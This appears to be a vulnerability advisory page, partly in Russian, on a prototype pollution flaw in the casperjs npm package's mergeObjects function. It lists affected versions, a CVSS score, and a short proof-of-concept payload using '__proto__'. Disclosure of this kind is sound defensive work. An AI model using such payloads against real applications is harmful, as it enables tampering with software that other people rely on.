Описание
Improperly Controlled Modification of Dynamically-Determined Object Attributes in casperjs
Overview
casperjs is a navigation scripting & testing utility for PhantomJS and SlimerJS.
Affected versions of this package are vulnerable to Prototype Pollution via the mergeObjects utility function.
PoC
var payload = JSON.parse('{"__proto__": {"a": "pwned"}}');
mergeObjects({}, payload);
console.log({}.a); // prints "pwned"
Пакеты
Наименование
casperjs
npm
Затронутые версииВерсия исправления
<= 1.1.4
Отсутствует
Связанные уязвимости
CVSS3: 7.3
nvd
больше 5 лет назад
In all versions of package casperjs, the mergeObjects utility function is susceptible to Prototype Pollution.